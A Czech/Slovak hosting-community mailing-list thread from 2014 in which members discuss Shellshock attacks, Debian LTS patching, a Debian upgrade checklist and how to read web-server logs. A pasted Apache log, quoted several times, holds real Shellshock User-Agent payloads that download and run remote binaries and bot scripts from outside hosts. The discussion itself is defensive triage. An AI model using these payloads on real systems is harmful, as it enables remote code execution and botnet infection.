From: "Michal Dobsovic" <dobsovic(a)itlearning.sk>
To: "vpsFree.cz Community list" <community-list(a)lists.vpsfree.cz>
Sent: 9/29/2014 11:20:57 PM
Subject: Re: [vpsFree.cz: community-list] Útoky na bash běží
Chystam sa robit dist upgrade z wheezy na squeeze. Ma s
tym niekto
prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie,
ale ak mate niekto prakticku skusenost a riesili ste aj nejaky problem,
urcite pomozete :)
Dik.
Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák <jirka.cer(a)gmail.com>
napísal(a):
>Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak
>jsem zjistil, že jsem neměl přidaný LTS repozitář. :)
>
>
>Dne 29. září 2014 14:16 Juraj Chlebec
><javascript:_e(%7B%7D,'cvml','havran@gmail.com');> napsal(a):
>>Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz
>>je vsetko ok.
>>
>>Juro Chlebec
>>
>>2014-09-29 13:57 GMT+02:00 Nikos Timiopulos
>><javascript:_e(%7B%7D,'cvml','nikos@manikstudio.cz');>:
>>>Ahoj,
>>>
>>>za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez
>>>LTS repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky:
>>>https://wiki.debian.org/LTS/Using
>>>
>>>
>>>Nikos
>>>
>>>On 29 Sep 2014, at 13:35, Petr Krcmar
>>><javascript:_e(%7B%7D,'cvml','petr.krcmar@vpsfree.cz');>
wrote:
>>>
>>>>Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
>>>>>V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou
>>>>>ještě
>>>>>napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a
>>>>>zkusíme
>>>>>na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě
>>>>>nemají
>>>>>záplatu (a zveřejním nějakou statistiku).
>>>>
>>>>Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
>>>>Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
>>>>
>>>>--
>>>>Petr Krčmář
>>>>vpsFree.cz
>>>>_______________________________________________
>>>>Community-list mailing list
>>>>javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz');
>>>>http://lists.vpsfree.cz/listinfo/community-list
>>>
>>>
>>>_______________________________________________
>>>Community-list mailing list
>>>javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz');
>>>http://lists.vpsfree.cz/listinfo/community-list
>>>
>>
>>
>>
>>--
>>Juraj Chlebec aka Havran
>>http://www.svoji.sk
>>
>>
>>_______________________________________________
>>Community-list mailing list
>>javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz');
>>http://lists.vpsfree.cz/listinfo/community-list
>>
>
10:30 p.m.
Doporučuju si na to vytvořit VPS na playgroundu, odladit a pak přehodit. Pokud používáš
mysql, apache apod. z balíčků squeeze, je vhodné se podívat na dokumentaci migrace
jednotlivých verzí - např. u mysql doporučují nejprve vytvořit zálohu a tu následně
obnovit už v nové verzi mysql
(http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html).
Třeba ještě pomůžou moje ne moc pohledné noob poznámky s postupem, které jsem během
upgradu sepsal. Nejprve jsou vypsány configy balíčků, kterých se upgrade týkal a dával na
výběr, zda ponechat současný config, nebo nahradit novým. To bude samozřejmě individuální,
nicméně v mém případě byl problém akorát s mysql:
/etc/crontab
/etc/default/rkhunter
/etc/fail2ban/jail.conf
/etc/sudoers
* /etc/mysql/my.cnf
/etc/php5/cli/php.ini
/etc/php5/cgi/php.ini
/etc/default/saslauthd
/etc/apache2/mods-available/ssl.conf
/etc/apache2/apache2.conf
/etc/apache2/mods-available/php5.conf
/etc/php5/apache2/php.ini
mysql: http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html
mysqldump -u root -p --all-databases > backup.sql
mysql -u root -p < backup.sql
0) apt-get remove --purge dovecot-common
1) apt-get update & upgrade & dist-upgrade of current distribution
2) dpgk --audit
3) mysql dump
4) edit sources.list squeeze -> wheezy
5) apt-get update & upgrade & dist-upgrade (keep current configs)
6) NOW - problem with mysql, replace old my.cnf with new my.cnf.dpkg-dist
7) apt-get autoremove
8) dpkg --audit , aptitude reinstall ****** all the packages listed in dpkg --audit
9) create /etc/my.cnf with:
[mysqld]
open_files_limit = 100000
9) mysql from dump (recommended by mysql)
10) apt-get install dovecot-common dovecot-imapd dovecot-pop3d
On 29 Sep 2014, at 23:20, Michal Dobsovic <dobsovic(a)itlearning.sk> wrote:
Chystam sa robit dist upgrade z wheezy na squeeze. Ma
s tym niekto prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale ak
mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite pomozete :)
Dik.
Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák <jirka.cer(a)gmail.com> napísal(a):
Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem zjistil, že jsem
neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec <havran(a)gmail.com> napsal(a):
Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos <nikos(a)manikstudio.cz>cz>:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které
záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar <petr.krcmar(a)vpsfree.cz> wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
--
Juraj Chlebec aka Havran
http://www.svoji.sk
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list V tuhle chvíli děláme na tom, abychom zjistili,
které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
--
Petr Krčmář
vpsFree.cz
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
30 Sep
30 Sep
1:02 p.m.
Co sa tyka mysql, vrele odporucam prechod na mariaDB. Bezi uplne bez problemov ako nahrada
za mysql a da sa tam dost dobre riesit HA cez Galera cluster.
Ja som mal jeden problem, a sice, ze aj ked som mal apache2 odinstalovany (pouzivam nginx
+ java) tak mi ho tam automaticky nainstalovalo (zrejme to je nejaky default balik alebo
bol ako dependency niecoho) a kedze startoval skor nez nginx, tak si chytil port 80 a tym
padom nginx nenastartoval, musel som to riesit rucne a ten apache vypnut, zmazat a
nastartovat nginx.
Taktiez, co sa tyka javy, ak pouzivate javu od Oraclu (nie OpenJDK) tak akykolvek upgrade
(nielen dist-upgrade ale akykolvek upgrade balika javy) prepise subory security extensions
naspat na defaultne, cize tym padom po upgrade je potrebny rucny zasah, inak nebude mozne
pouzit v sifrovacich algoritmoch lepsie nez 128bitove kluce.
Ak nie je mozne pouzit prehodenie z playgroundu, urcite odporucam si to na playgrounde
minimalne vopred odskusat, takto som o problemoch s apachom ci s javou vedel dopredu a
pripravil som si script, ktory som po dokonceni upgradu spusitl a ten mi pofixoval vsetko
ostatne, takze som uz nad tym nematuroval a downtime bol naozaj minimalny :)
On 30 Sep 2014, at 00:30, Nikos Timiopulos
<nikos(a)manikstudio.cz> wrote:
Doporučuju si na to vytvořit VPS na playgroundu, odladit a pak přehodit. Pokud používáš
mysql, apache apod. z balíčků squeeze, je vhodné se podívat na dokumentaci migrace
jednotlivých verzí - např. u mysql doporučují nejprve vytvořit zálohu a tu následně
obnovit už v nové verzi mysql
(http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html
<http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html>).
Třeba ještě pomůžou moje ne moc pohledné noob poznámky s postupem, které jsem během
upgradu sepsal. Nejprve jsou vypsány configy balíčků, kterých se upgrade týkal a dával na
výběr, zda ponechat současný config, nebo nahradit novým. To bude samozřejmě individuální,
nicméně v mém případě byl problém akorát s mysql:
/etc/crontab
/etc/default/rkhunter
/etc/fail2ban/jail.conf
/etc/sudoers
* /etc/mysql/my.cnf
/etc/php5/cli/php.ini
/etc/php5/cgi/php.ini
/etc/default/saslauthd
/etc/apache2/mods-available/ssl.conf
/etc/apache2/apache2.conf
/etc/apache2/mods-available/php5.conf
/etc/php5/apache2/php.ini
mysql: http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html
<http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html>
mysqldump -u root -p --all-databases > backup.sql
mysql -u root -p < backup.sql
0) apt-get remove --purge dovecot-common
1) apt-get update & upgrade & dist-upgrade of current distribution
2) dpgk --audit
3) mysql dump
4) edit sources.list squeeze -> wheezy
5) apt-get update & upgrade & dist-upgrade (keep current configs)
6) NOW - problem with mysql, replace old my.cnf with new my.cnf.dpkg-dist
7) apt-get autoremove
8) dpkg --audit , aptitude reinstall ****** all the packages listed in dpkg --audit
9) create /etc/my.cnf with:
[mysqld]
open_files_limit = 100000
9) mysql from dump (recommended by mysql)
10) apt-get install dovecot-common dovecot-imapd dovecot-pop3d
On 29 Sep 2014, at 23:20, Michal Dobsovic <dobsovic(a)itlearning.sk
<mailto:dobsovic@itlearning.sk>> wrote:
Chystam sa robit dist upgrade z wheezy na
squeeze. Ma s tym niekto prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo
nie, ale ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite
pomozete :)
Dik.
Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák <jirka.cer(a)gmail.com
<mailto:jirka.cer@gmail.com>> napísal(a):
Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem zjistil, že jsem
neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec <havran(a)gmail.com
<javascript:_e(%7B%7D,'cvml','havran@gmail.com');>> napsal(a):
Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos <nikos(a)manikstudio.cz
<javascript:_e(%7B%7D,'cvml','nikos@manikstudio.cz');>>:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které
záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
<https://wiki.debian.org/LTS/Using>
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar <petr.krcmar(a)vpsfree.cz
<javascript:_e(%7B%7D,'cvml','petr.krcmar@vpsfree.cz');>> wrote:
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
<javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz');>
http://lists.vpsfree.cz/listinfo/community-list
<http://lists.vpsfree.cz/listinfo/community-list>
--
Juraj Chlebec aka Havran
http://www.svoji.sk <http://www.svoji.sk/>
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
<javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz');>
http://lists.vpsfree.cz/listinfo/community-list
<http://lists.vpsfree.cz/listinfo/community-list>
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz <mailto:Community-list@lists.vpsfree.cz>
http://lists.vpsfree.cz/listinfo/community-list V tuhle chvíli děláme na tom, abychom zjistili,
které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
--
Petr Krčmář
vpsFree.cz
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
<javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz');>
http://lists.vpsfree.cz/listinfo/community-list
<http://lists.vpsfree.cz/listinfo/community-list>
29 Sep
29 Sep
8:37 a.m.
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi
200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404
168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh
HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O
/var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget
http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh
http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální
verzi Debianu). Viz výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28
Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1)
End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57
Install: php5-cli:amd64 (5.4.33-1~dotdeb.1)
End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51
Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3)
End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář"
napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit,
zda ten průnik byl
úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam
vidíš
404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost
ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník
kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál.
Jestli byl útok úspěšný tam nevyčteš.
8:40 a.m.
Dne 29.9.2014 v 10:37 "Jan B. Kolář" napsal(a):
Poradíte, co teď dál?
Nic. Pokud je bash záplatovaný, tak jsou to jen dotazy na konkrétní
stránky, kterým se útočník snažil podvrhnout v requestu kód.
Pravděpodobně to kvůli záplatovanému bashi selhalo, takže je to OK.
--
Petr Krčmář
vpsFree.cz
8:42 a.m.
Ok, sorry za paniku. Pondělky jsou vždycky na houby ;-)
On 29.9.2014 10:40, Petr Krcmar wrote:
Dne 29.9.2014 v 10:37 "Jan B. Kolář"
napsal(a):
Poradíte, co teď dál?
Nic. Pokud je bash
záplatovaný, tak jsou to jen dotazy na konkrétní
stránky, kterým se útočník snažil podvrhnout v requestu kód.
Pravděpodobně to kvůli záplatovanému bashi selhalo, takže je to OK.
9:42 a.m.
Osobne si myslim ze 200 odpovede nemusia nic znamenat. Ked si vsimnes, 404 to vratilo pri
/test a /cgi-bin/test.sh co su URL ktore ocividne nemas, ale / ocividne mas :) a tam to
vratilo 200.
Ono aj ked mas zranitelny bash, stale sa nic nemuselo stat, problem je hlavne ak web bezi
cez CGI, a co som sa o tom bavil so sysadminom jedneho zakaznika, tak pri FastCGI (bezne
riesenie pri PHP pod nginx) SCGI a pod. vraj treba aby bash bol pouzity ako CGI jazyk,
lebo FastCGI a pod. nepouzivju premenne prostredia na posuvanie informacii skriptu. A
uprimne povedane, nepoznam vela webov ktore dnes bezia cez klasicke CGI, a pouzit bash ako
skriptovaci jazyk pre FastCGI mi teda ako dobry napad nepride :)
Anyways, 200 znamena, ze tvoj webserver uspesne spracoval request, a pokial zrovna
nepouzivas CGI, tak mas viac menej Ty kontrolu nad tym ci je mozne obsah tych params
spustit v shelli alebo nie :)
On 29 Sep 2014, at 10:37, Jan B. Kolář
<janbivoj.kolar(a)zazen-nudu.cz> wrote:
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh HTTP/1.0"
404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot
-O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf
/tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi Debianu). Viz
výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28
Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1)
End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57
Install: php5-cli:amd64 (5.4.33-1~dotdeb.1)
End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51
Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3)
End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář"
napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list možná hloupá otázka - dá se nějak z logu zjistit,
zda ten průnik byl
úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam
vidíš
404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost
ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník
kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál.
Jestli byl útok úspěšný tam nevyčteš.
9:53 a.m.
Tymto ovsem nechcem podcenovat vaznost tej chyby a dolezitost updatu, len som chcel
poukazat na to ze webserver zrovna nie je pri tejto chybe najzranitelnejsi. DHCP vidim
ako daleko zranitelnejsi, prip. to, ze kvoli tejto chybe sa moze stat lahko zranitelnou
nejaka nahodna aplikacia/utilita ktoru na masine mozete mat.
On 29 Sep 2014, at 11:42, Ján Raška
<raskaj(a)gmail.com> wrote:
Osobne si myslim ze 200 odpovede nemusia nic znamenat. Ked si vsimnes, 404 to vratilo pri
/test a /cgi-bin/test.sh co su URL ktore ocividne nemas, ale / ocividne mas :) a tam to
vratilo 200.
Ono aj ked mas zranitelny bash, stale sa nic nemuselo stat, problem je hlavne ak web bezi
cez CGI, a co som sa o tom bavil so sysadminom jedneho zakaznika, tak pri FastCGI (bezne
riesenie pri PHP pod nginx) SCGI a pod. vraj treba aby bash bol pouzity ako CGI jazyk,
lebo FastCGI a pod. nepouzivju premenne prostredia na posuvanie informacii skriptu. A
uprimne povedane, nepoznam vela webov ktore dnes bezia cez klasicke CGI, a pouzit bash ako
skriptovaci jazyk pre FastCGI mi teda ako dobry napad nepride :)
Anyways, 200 znamena, ze tvoj webserver uspesne spracoval request, a pokial zrovna
nepouzivas CGI, tak mas viac menej Ty kontrolu nad tym ci je mozne obsah tych params
spustit v shelli alebo nie :)
On 29 Sep 2014, at 10:37, Jan B. Kolář
<janbivoj.kolar(a)zazen-nudu.cz> wrote:
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh HTTP/1.0"
404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot
-O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf
/tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi Debianu). Viz
výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28
Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1)
End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57
Install: php5-cli:amd64 (5.4.33-1~dotdeb.1)
End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51
Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3)
End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář"
napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list možná hloupá otázka - dá se nějak z logu zjistit,
zda ten průnik byl
úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam
vidíš
404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost
ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník
kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál.
Jestli byl útok úspěšný tam nevyčteš.
9:58 a.m.
New subject: [vpsFree.cz: community-list] Útoky na bash běží
Jinak ono zakernost tedle chyby je to, ze se ten bash nemusi pouzivat
naprimo, ale staci, aby se z procesu, ktery ma nejakym zpusobem
zmanipulovane env pustil system('cokoliv'), a to klidne i na urovni
nejake ceckove knihovny, u ktere si to clovek "zvenku" neuvedomi.
U cisteho CGI je jednoducha cesta, jak zmanipulovat env, jelikoz se
ruzne parametry o requestu predavaji prave v env, konkretne uplne
nejjednodussi je asi user agent, kterej se typicky predava v
$HTTP_USER_AGENT.
Vyhodou FastCGI a podobnych je to, ze amanipulovat env neni tak
jednoduche, jelikoz info o jednotlivych requestech se predava jinak,
konkretne u FastCGI socketem.
Takze opravdu v zasade ani 200, ani 404 nemusi nic znamenat :(
Zdar, Petr
On 9/29/14, Ján Raška <raskaj(a)gmail.com> wrote:
Osobne si myslim ze 200 odpovede nemusia nic znamenat.
Ked si vsimnes, 404
to vratilo pri /test a /cgi-bin/test.sh co su URL ktore ocividne nemas, ale
/ ocividne mas :) a tam to vratilo 200.
Ono aj ked mas zranitelny bash, stale sa nic nemuselo stat, problem je
hlavne ak web bezi cez CGI, a co som sa o tom bavil so sysadminom jedneho
zakaznika, tak pri FastCGI (bezne riesenie pri PHP pod nginx) SCGI a pod.
vraj treba aby bash bol pouzity ako CGI jazyk, lebo FastCGI a pod.
nepouzivju premenne prostredia na posuvanie informacii skriptu. A uprimne
povedane, nepoznam vela webov ktore dnes bezia cez klasicke CGI, a pouzit
bash ako skriptovaci jazyk pre FastCGI mi teda ako dobry napad nepride :)
Anyways, 200 znamena, ze tvoj webserver uspesne spracoval request, a pokial
zrovna nepouzivas CGI, tak mas viac menej Ty kontrolu nad tym ci je mozne
obsah tych params spustit v shelli alebo nie :)
On 29 Sep 2014, at 10:37, Jan B. Kolář
<janbivoj.kolar(a)zazen-nudu.cz>
wrote:
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi
200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh
HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O
/var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget
http://stablehost.us/bots/regular.bot
-O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh
/tmp/sh;rm -rf /tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi
Debianu). Viz výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28
Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1)
End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57
Install: php5-cli:amd64 (5.4.33-1~dotdeb.1)
End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51
Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3)
End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
Dne 29.9.2014 v 10:08 "Jan B. Kolář"
napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list možná hloupá otázka - dá se nějak z logu zjistit,
zda ten průnik byl
úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam
vidíš
404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost
ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník
kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál.
Jestli byl útok úspěšný tam nevyčteš.
10:12 a.m.
Presne tak, neviem koho napadlo ze 404 znamena ze je vsetko v pohode, ved predsa HTTP
status code indikuje nieco uplne ine nez to ci sa nastavili nejake env. vars, prip. ci sa
spustali nejake externe prikazy. Moze sice indikovat neexistujuci skript (tam je ale potom
otazne ci sa v takom pripade 404 vrati este pred nastavenim env. vars, v tom sa az tak
nevyznam), ale predsa aj existujuci skript moze vratit 404, to je predsa uplne normalna
vec ktoru skript vrati pri poziadavke na get/update/delete neexistujuceho obsahu.
On 29 Sep 2014, at 11:58, Petr Sykora
<petr.sykora(a)gmail.com> wrote:
Jinak ono zakernost tedle chyby je to, ze se ten bash nemusi pouzivat
naprimo, ale staci, aby se z procesu, ktery ma nejakym zpusobem
zmanipulovane env pustil system('cokoliv'), a to klidne i na urovni
nejake ceckove knihovny, u ktere si to clovek "zvenku" neuvedomi.
U cisteho CGI je jednoducha cesta, jak zmanipulovat env, jelikoz se
ruzne parametry o requestu predavaji prave v env, konkretne uplne
nejjednodussi je asi user agent, kterej se typicky predava v
$HTTP_USER_AGENT.
